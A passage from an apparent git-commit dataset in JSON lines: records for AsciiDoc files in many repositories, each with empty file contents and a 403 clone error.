requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ca0374f3927564a7b4a96a0396a19a7101b188d","subject":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"2c47addc6b9273c4d398d5fc42c248d422eabbce","subject":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-10-18-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7940a95c6fe7c2f8458132e62f4e708f59d34ec3","subject":"Check install JDK","message":"Check install JDK\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/Various.adoc","new_file":"Best practices\/Various.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c2e05bc7bf42b7dad48fda98fe4268295493627","subject":"chore(then-or-catch): \u8aad\u307f\u8fbc\u3080\u30d5\u30a1\u30a4\u30eb\u304c\u307e\u3061\u304c\u3063\u3066\u3044\u305f\u306e\u3067\u4fee\u6b63","message":"chore(then-or-catch): \u8aad\u307f\u8fbc\u3080\u30d5\u30a1\u30a4\u30eb\u304c\u307e\u3061\u304c\u3063\u3066\u3044\u305f\u306e\u3067\u4fee\u6b63\n","repos":"cqricky\/promises-book,tangjinzhou\/promises-book,dieface\/promises-book,oToUC\/promises-book,wangwei1237\/promises-book,oToUC\/promises-book,charlenopires\/promises-book,azu\/promises-book,sunfurong\/promise,lidasong2014\/promises-book,charlenopires\/promises-book,wenber\/promises-book,wangwei1237\/promises-book,sunfurong\/promise,azu\/promises-book,wangwei1237\/promises-book,azu\/promises-book,liyunsheng\/promises-book,xifeiwu\/promises-book,genie88\/promises-book,mzbac\/promises-book,tangjinzhou\/promises-book,wenber\/promises-book,cqricky\/promises-book,genie88\/promises-book,xifeiwu\/promises-book,lidasong2014\/promises-book,xifeiwu\/promises-book,liubin\/promises-book,sunfurong\/promise,oToUC\/promises-book,purepennons\/promises-book,lidasong2014\/promises-book,mzbac\/promises-book,purepennons\/promises-book,mzbac\/promises-book,purepennons\/promises-book,liyunsheng\/promises-book,liubin\/promises-book,azu\/promises-book,liyunsheng\/promises-book,genie88\/promises-book,tangjinzhou\/promises-book,dieface\/promises-book,charlenopires\/promises-book,dieface\/promises-book,liubin\/promises-book,wenber\/promises-book,cqricky\/promises-book","old_file":"Ch2_HowToWrite\/promise-race.adoc","new_file":"Ch2_HowToWrite\/promise-race.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"885fd6be03f92fa5e408f1940402e6eb7ff744e5","subject":"chore(promise-resolve): add resolve-thenable.adoc to index","message":"chore(promise-resolve): add resolve-thenable.adoc to 
index\n","repos":"liubin\/promises-book,oToUC\/promises-book,oToUC\/promises-book,tangjinzhou\/promises-book,liubin\/promises-book,sunfurong\/promise,sunfurong\/promise,wangwei1237\/promises-book,genie88\/promises-book,genie88\/promises-book,azu\/promises-book,oToUC\/promises-book,wangwei1237\/promises-book,liubin\/promises-book,lidasong2014\/promises-book,sunfurong\/promise,genie88\/promises-book,charlenopires\/promises-book,liyunsheng\/promises-book,dieface\/promises-book,tangjinzhou\/promises-book,xifeiwu\/promises-book,liyunsheng\/promises-book,purepennons\/promises-book,cqricky\/promises-book,wenber\/promises-book,wenber\/promises-book,cqricky\/promises-book,liyunsheng\/promises-book,mzbac\/promises-book,purepennons\/promises-book,mzbac\/promises-book,azu\/promises-book,lidasong2014\/promises-book,dieface\/promises-book,wenber\/promises-book,dieface\/promises-book,mzbac\/promises-book,purepennons\/promises-book,cqricky\/promises-book,tangjinzhou\/promises-book,xifeiwu\/promises-book,xifeiwu\/promises-book,wangwei1237\/promises-book,azu\/promises-book,charlenopires\/promises-book,azu\/promises-book,lidasong2014\/promises-book,charlenopires\/promises-book","old_file":"Ch4_AdvancedPromises\/readme.adoc","new_file":"Ch4_AdvancedPromises\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1bd96ea42f445b6575ae8de834456ad63b13e4a","subject":"Basic Deployment using the Keycloak Operator","message":"Basic Deployment using the Keycloak Operator\n\nCo-authored-by: V\u00e1clav Muzik\u00e1\u0159 <266c716f8aa37f1b7602aa75cfd3259e02ad7a15@redhat.com>\n","repos":"ahus1\/keycloak,reneploetz\/keycloak,mhajas\/keycloak,reneploetz\/keycloak,thomasdarimont\/keycloak,hmlnarik\/keycloak,ahus1\/keycloak,srose\/keycloak,hmlnarik\/keycloak,abstractj\/keycloak,raehalme\/keycloak,ahus1\/keycloak,mhajas\/keycloak,srose\/keycloak,ahus1\/keycloak,mhajas\/keycloak,jpkrohling\/keycloak,jpkrohling\/keycloak,keycloak\/keycloak,keycloak\/keycloak,stianst\/keycloak,raehalme\/keycloak,stianst\/keycloak,thomasdarimont\/keycloak,keycloak\/keycloak,mhajas\/keycloak,raehalme\/keycloak,hmlnarik\/keycloak,raehalme\/keycloak,abstractj\/keycloak,hmlnarik\/keycloak,jpkrohling\/keycloak,hmlnarik\/keycloak,thomasdarimont\/keycloak,abstractj\/keycloak,ahus1\/keycloak,keycloak\/keycloak,srose\/keycloak,reneploetz\/keycloak,mhajas\/keycloak,raehalme\/keycloak,reneploetz\/keycloak,ahus1\/keycloak,srose\/keycloak,thomasdarimont\/keycloak,jpkrohling\/keycloak,thomasdarimont\/keycloak,srose\/keycloak,stianst\/keycloak,keycloak\/keycloak,jpkrohling\/keycloak,raehalme\/keycloak,abstractj\/keycloak,thomasdarimont\/keycloak,hmlnarik\/keycloak,abstractj\/keycloak,stianst\/keycloak,reneploetz\/keycloak,stianst\/keycloak","old_file":"docs\/guides\/src\/main\/operator\/basic-deployment.adoc","new_file":"docs\/guides\/src\/main\/operator\/basic-deployment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ahus1\/keycloak.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"14f50f4f52920899c08e42568321db6095651659","subject":"Deleted _posts\/2016-07-21-test.adoc","message":"Deleted 
_posts\/2016-07-21-test.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-21-test.adoc","new_file":"_posts\/2016-07-21-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a81d2075fe07b9147dbc3cd100ac5d87d00b4b1","subject":"Update 2018-11-10-Fear.adoc","message":"Update 2018-11-10-Fear.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2018-11-10-Fear.adoc","new_file":"_posts\/2018-11-10-Fear.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"540893515868aa1ca7a9420908c9a32eed3d4b02","subject":"Bumping versions","message":"Bumping versions","repos":"spring-cloud\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,spring-cloud\/spring-cloud-stream","old_file":"binders\/kinesis-binder\/spring-cloud-stream-binder-kinesis-docs\/src\/main\/asciidoc\/_configprops.adoc","new_file":"binders\/kinesis-binder\/spring-cloud-stream-binder-kinesis-docs\/src\/main\/asciidoc\/_configprops.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-stream.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"93d76f602abbc76e6a403e0c0c072cdbaa431705","subject":"new Migration Guide to v3","message":"new Migration Guide to v3\n","repos":"remicollet\/php-reflect,llaville\/php-reflect","old_file":"docs\/migration-guide-30.asciidoc","new_file":"docs\/migration-guide-30.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remicollet\/php-reflect.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"b2256fb9e9f4b02bc5698d2956e5e951c8929bb7","subject":"NEXTGEN-9 #close Added back social, with explanation for AA propagation pain point","message":"NEXTGEN-9 #close Added back social, with explanation for AA propagation pain point\n","repos":"kbase\/nextgen,kbase\/nextgen,kbase\/nextgen","old_file":"docs\/challenges\/social.asciidoc","new_file":"docs\/challenges\/social.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kbase\/nextgen.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58d6c79c0019dee29d45901cb08e228eb647459e","subject":"[DOCS] Added ML limitation (elastic\/x-pack-elasticsearch#4081)","message":"[DOCS] Added ML limitation (elastic\/x-pack-elasticsearch#4081)\n\nOriginal commit: 
elastic\/x-pack-elasticsearch@378bf49b1de387e58c4e6b02d42b9a59b8e97cd2\n","repos":"GlenRSmith\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch","old_file":"docs\/en\/ml\/limitations.asciidoc","new_file":"docs\/en\/ml\/limitations.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"43a2572e7db079a660e1c26849214a64dbc0e206","subject":"[DOCS] Fixed typo in over_field_name","message":"[DOCS] Fixed typo in over_field_name\n\nOriginal commit: elastic\/x-pack-elasticsearch@c366d43448df66d95d9f83b5794deb853d3a81c5\n","repos":"gingerwizard\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch","old_file":"docs\/en\/ml\/populations.asciidoc","new_file":"docs\/en\/ml\/populations.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c53e1689f633bcf1a590971968848bac95051343","subject":"Update 2015-09-29-That-was-my-jam.adoc","message":"Update 
2015-09-29-That-was-my-jam.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06844f356ede854de498bf0cf9660ebc805fb8e1","subject":"Added load balancing document","message":"Added load balancing document\n\nFirst version of load balancing document added. First few steps for\nsetting up an nginx load balancer\n","repos":"ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1,ohaz\/amos-ss15-proj1","old_file":"documentation\/loadbalancing.adoc","new_file":"documentation\/loadbalancing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ohaz\/amos-ss15-proj1.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"1b63d429920edc636ba0157e0f2819d485c9c58a","subject":"Update 2012-12-05-Menggunakan-WinRAR-di-VPS.adoc","message":"Update 2012-12-05-Menggunakan-WinRAR-di-VPS.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2012-12-05-Menggunakan-WinRAR-di-VPS.adoc","new_file":"_posts\/2012-12-05-Menggunakan-WinRAR-di-VPS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cac8312270795d3250013d72256bc34f13959ab9","subject":"Update 2015-09-23-Yeah-About-that-story.adoc","message":"Update 2015-09-23-Yeah-About-that-story.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-09-23-Yeah-About-that-story.adoc","new_file":"_posts\/2015-09-23-Yeah-About-that-story.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aabbbb5db7cca0496716c2f657813ff8a46bd65d","subject":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","message":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f20151fdd576f5519bbcf258107ba27b436cd472","subject":"Update 2016-06-10-studysite.adoc","message":"Update 
2016-06-10-studysite.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-10-studysite.adoc","new_file":"_posts\/2016-06-10-studysite.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6af30b780bb2321639a058fa27e32dcfe79687c8","subject":"Update 2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","message":"Update 2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","new_file":"_posts\/2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1664bd5d160d0a1205852a1bf39d9438be7818cc","subject":"Update 2016-11-05-A-Practical-Look-at-Latency-in-Robotics-Ethernet-and-UDP.adoc","message":"Update 2016-11-05-A-Practical-Look-at-Latency-in-Robotics-Ethernet-and-UDP.adoc","repos":"ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io","old_file":"_posts\/2016-11-05-A-Practical-Look-at-Latency-in-Robotics-Ethernet-and-UDP.adoc","new_file":"_posts\/2016-11-05-A-Practical-Look-at-Latency-in-Robotics-Ethernet-and-UDP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ennerf\/ennerf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9fcd3616b620051a831e80c59bca555453b8e4d","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/implementation_details.adoc","new_file":"content\/writings\/implementation_details.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"33ff731e9750a1da8059718b8d5db2fc6d75cac8","subject":"Update 2016-03-01-git.adoc","message":"Update 2016-03-01-git.adoc","repos":"chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io","old_file":"_posts\/2016-03-01-git.adoc","new_file":"_posts\/2016-03-01-git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chbailly\/chbailly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1fa091e5720a30dce36a11ce78651d22227b2020","subject":"y2b create post iPhone 6: Top 5 Missing Features!","message":"y2b create post iPhone 6: Top 5 Missing 
Features!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-09-21-iPhone-6-Top-5-Missing-Features.adoc","new_file":"_posts\/2014-09-21-iPhone-6-Top-5-Missing-Features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dad60db68498f2a4f9bbd77e33d27573b116cf08","subject":"Update 2015-01-04-O-Suicidio-Mais-Bizarro-de-1994.adoc","message":"Update 2015-01-04-O-Suicidio-Mais-Bizarro-de-1994.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2015-01-04-O-Suicidio-Mais-Bizarro-de-1994.adoc","new_file":"_posts\/2015-01-04-O-Suicidio-Mais-Bizarro-de-1994.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e617c24dd7f9e3b43a1515af7357dc2940ecb1d9","subject":"Update 2016-12-07-Projet-Presidentielle-Francaise.adoc","message":"Update 2016-12-07-Projet-Presidentielle-Francaise.adoc","repos":"Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io","old_file":"_posts\/2016-12-07-Projet-Presidentielle-Francaise.adoc","new_file":"_posts\/2016-12-07-Projet-Presidentielle-Francaise.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mediashare\/Mediashare.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca0139433dbe44648f1e5ec8a37c41a703c96898","subject":"Update 2015-07-07-Desarrollo-de-una-aplicacion-desde-cero-Implementacion-y-depuracion-del-Modelo-y-la-Vista.adoc","message":"Update 2015-07-07-Desarrollo-de-una-aplicacion-desde-cero-Implementacion-y-depuracion-del-Modelo-y-la-Vista.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-07-07-Desarrollo-de-una-aplicacion-desde-cero-Implementacion-y-depuracion-del-Modelo-y-la-Vista.adoc","new_file":"_posts\/2015-07-07-Desarrollo-de-una-aplicacion-desde-cero-Implementacion-y-depuracion-del-Modelo-y-la-Vista.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lametaweb\/lametaweb.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a87bc3d589eecc870dab7699719e79ba156d32f","subject":"Update 2016-02-28-react-native-Few-words-about-Navigator-and-scene-animation.adoc","message":"Update 2016-02-28-react-native-Few-words-about-Navigator-and-scene-animation.adoc\n","repos":"doochik\/doochik.github.io,doochik\/doochik.github.io,doochik\/doochik.github.io,doochik\/doochik.github.io","old_file":"_posts\/2016-02-28-react-native-Few-words-about-Navigator-and-scene-animation.adoc","new_file":"_posts\/2016-02-28-react-native-Few-words-about-Navigator-and-scene-animation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/doochik\/doochik.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d6fec0c23dc6e3ab1f6a889e07ae5420c018d1b","subject":"TELCODOCS-213 Updated with suggested changes","message":"TELCODOCS-213 Updated with suggested changes\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/ztp-ai-install-ocp-clusters-on-bare-metal.adoc","new_file":"modules\/ztp-ai-install-ocp-clusters-on-bare-metal.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d10a75dfe98a3d86067f0db3e6d5896768e81ad1","subject":"Update 2016-03-11-Blog-Title.adoc","message":"Update 2016-03-11-Blog-Title.adoc","repos":"sinemaga\/sinemaga.github.io,sinemaga\/sinemaga.github.io,sinemaga\/sinemaga.github.io,sinemaga\/sinemaga.github.io","old_file":"_posts\/2016-03-11-Blog-Title.adoc","new_file":"_posts\/2016-03-11-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sinemaga\/sinemaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1eeec5fd68ee6e7e9ef6e42cd313362af4e62727","subject":"Update 2016-04-04-Javascript.adoc","message":"Update 2016-04-04-Javascript.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Javascript.adoc","new_file":"_posts\/2016-04-04-Javascript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e5994e44fab7d6dfdc3034f8e1f007452ce7ad2","subject":"Update 2016-07-03-Neuer-Post.adoc","message":"Update 2016-07-03-Neuer-Post.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2016-07-03-Neuer-Post.adoc","new_file":"_posts\/2016-07-03-Neuer-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"157507e06a620b0fa8d162087be89d57d9c766cb","subject":"Update 2016-04-07-Banner-grabbing.adoc","message":"Update 2016-04-07-Banner-grabbing.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Banner-grabbing.adoc","new_file":"_posts\/2016-04-07-Banner-grabbing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38277ab99861ad37f9f07ccf61b6a043340993a4","subject":"Publish 2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","message":"Publish 
2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","new_file":"2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3726c875608b056a2bf04d9f391cd532e638ca0","subject":"Update 2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","message":"Update 2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","new_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1665f701956a218ec2a6e419b17d22dec79ae61e","subject":"Update 2017-05-21-Typeclasses-in-haskell.adoc","message":"Update 2017-05-21-Typeclasses-in-haskell.adoc","repos":"seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io","old_file":"_posts\/2017-05-21-Typeclasses-in-haskell.adoc","new_file":"_posts\/2017-05-21-Typeclasses-in-haskell.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seturne\/hubpress.io.git\/': The requested URL returned error: 